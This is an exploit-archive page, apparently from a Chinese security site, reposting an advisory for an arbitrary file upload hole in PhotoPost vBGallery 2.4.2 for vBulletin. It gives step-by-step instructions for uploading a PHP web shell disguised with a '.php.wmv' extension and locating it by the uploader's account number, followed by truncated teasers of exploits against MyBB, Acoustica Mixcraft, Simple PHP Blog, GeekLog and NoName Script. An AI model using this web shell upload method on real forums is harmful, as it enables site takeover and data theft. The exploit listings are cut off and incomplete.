PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability
所属分类:
网络安全 / Exploit
阅读数:
92
收藏 0赞 0分享
vBulletin PhotoPost vBGallery v2.x Remote File Upload
Found by : Cold z3ro
e-mail : exploiter@hackteach.org
Home page : www.Hack.ps
==============================
exploit usage :
http://localhost/Forum/$gallery_path/upload.php
here the exploiter can upload php shell via this script
by renamed it's name to $name.php.wmv
but first he should be a user in the forum
thats so important to him cus the uploaded file will be
in his account nomber folder .
example :
user : Cold z3ro
http://www.hackteach.org/cc/member.php?u=4
his account nomber is 4 as shown in link ,
the uploaded file ( shell ) will be in
http://localhost/Forum/$gallery_path/files/4/$name.php.wmv
id the user Cold z3ro have acconut nomber as example ( 12345 )
the file path is
http://localhost/Forum/$gallery_path/files/1/2/3/4/5/$name.php.wmv
===================
i want tho thank all members in www.hackteach.org forums , best work u are done.
thank u .
# hackteach.org
MyBulletinBoard (MyBB)
<?php
// forum mybb <= 1.2.11 remote sql injection vulnerability
// bug found by Janek Vind "waraxe" http://www.waraxe
收藏 0赞 0分享
Acoustica Mixcraft
#!/usr/bin/perl
#
# Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit
# Author: Koshi
#
# Date: 08-28-08 ( 0day )
# Ap
收藏 0赞 0分享
Simple PHP Blog (SPHPBlog)
<?
/*
sIMPLE php bLOG 0.5.0 eXPLOIT
bY mAXzA 2008
*/
function curl($url,$postvar){
global $cook;
$ch = cur
收藏 0赞 0分享
GeekLog
#!/usr/bin/perl
use warnings;
use strict;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
收藏 0赞 0分享
NoName Script
################################################################################
[ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0赞 0分享
